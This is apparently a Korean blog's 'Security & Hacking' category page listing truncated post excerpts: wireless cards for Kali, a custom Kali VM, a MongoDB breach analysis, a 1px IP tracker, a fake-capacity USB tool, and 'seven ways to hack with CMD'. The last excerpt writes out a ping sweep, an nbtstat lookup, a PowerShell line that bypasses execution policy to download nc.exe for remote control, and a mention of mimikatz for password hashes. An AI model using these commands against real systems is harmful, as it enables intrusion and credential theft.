보안 & 해킹(114)
-
칼리와 호환되는 무선랜 모의해킹용 랜카드 목록
리스트는 국내에서 저렴하게 구입할 수 있는 무선 랜카드 목록이다. iptime 2000UA iptime A2000U iptime N150UAiptime N100 mini Netgear A6210 해외에서는 TP-LINK TL-WN722N (비싸지만 성능이 좋음)Alfa AWUS036NHAlfa AWUS036NHAPanda PAU05Alfa AWUS051NHAlfa AWUS036NEHPanda PAU09Alfa AWUS036ACH 과 같은 제품 목록이 있다. 개인적으로는 실습 용으로는 국내용으로 충분하고 침투 테스트용이나 고성능을 원한다면 해외 제품을 추천한다. 본인은 Alfa 무선랜카드를 사용중이다. 무엇을 사용해야 할지 모르겠다면 위 표도 참고해볼 것.
2020.11.29 -
Kali 2020.1 VMWare 배포
칼리리눅스 2020.1 버전 VMWare용 커스텀입니다. 모든 변경사항은 아래있습니다. 링크는 2곳에서 받으실 수 있습니다. Kali Rolling (2020.1) x64 Username: kali Password: kali ======================== = All of Custom Settings bellow ======================== 1. Asia/Seoul TimeZone 2. Add alias ll='ls -alF' 3. Firefox Add-on - Hackbar : see on development tools - Foxy proxy - Cookie Manager 4. Terminal - Transparency : 0% - Font Size : 12 5. Supp..
2020.06.25 -
MongoDB 해킹, 허니팟 구축, 침해사고 분석
MongoDB가 해킹당하다 MongoDB를 주로 사용하는데, 회사 개발 서버에 가끔 DB가 사라지는 마법(?)이 일어났다. 개발서버라서 신경안쓰다가 두어번 반복되자 로그를 찾아보았다. dropDatabase 명령어로 테이블을 무자비하게 날려버리며 HOW_TO_RECOVERY_BASE.README를 생성하였다. 공격자가 생성한 DB를 들어가보니 안들어가졌다. (사실 이때 root 계정으로 들어갔어야 했었던것 같은데...) 공격지ip주소가 러시아로 확인되었다. 페이스북 커뮤니티에 질의응답을 하였다. 댓글들은 mongodb 웹서버 어플리케이션에서 타고 들어온 것과 네트워크 통한 전파 등을 의심하는 분들이 많았다. 하지만 나는 외부저장소나 코딩실수로 인한 DB정보 노출보다는 취약점 또는 스캐너에 의한 침입이라고..
2020.06.25 -
상대방의 아이피를 알아낼 수 있을까? 1PX-IP-Tracker
이것은 1px 트래커 입니다. 이상해보이는 링크만 조심하면 될까요? IP 주소는 어떻게 알아낼 수 있을까요? 테스트 용도이기 때문에 리스트에 보여지는 아이피는 *로 대체됩니다. https://github.com/whackur/simple-1px-ip-tracker 해당 페이지로 가시면 여러분 자신의 ip가 있을 겁니다. http://pi.hakhub.net:82/tracker_list_for_me 불러오는 중입니다...
2020.02.19 -
가짜 2TB USB 만들기
유튜브 영상 링크 영상 링크 Dependency OS : Windows 64 bit Powershell Tested on Windows 10 Download Link #1 Google Drive Link Link #2 Warning!!!!!! Do not skip this. This program may be used for FUN OR EDUCATIONAL PURPOSES ONLY Do not abuse. All data will be lost. Make sure backup. It is not possible to use the increased capacity normally by increasing the capacity by fake. Do not connect or remove the devi..
2020.01.12 -
CMD로 해킹하는 7가지 방법
유튜브 영상 링크 YouTube www.youtube.com 1.ping으로 아이피주소 알아내기 2.ping으로 아이피주소 스캔하기 for /L %i in (0,1,255) do ping -n 1 -w 250 192.168.10.%i >> ipaddress.txt 3.상대방 호스트 이름 알아내기 nbtstat -A 192.168.10.1 4.파워쉘로 프로그램 받기, nc로 원격제어하기 powershell.exe -ExecutionPolicy ByPass -WindowStyle Normal (New-Object System.Net.WebClient).DownloadFile('http://program.com/nc.exe', 'nc.exe'); 5.해시와 패스워드 알아내기 mimikatz 다운로드 후 pri..
2019.12.28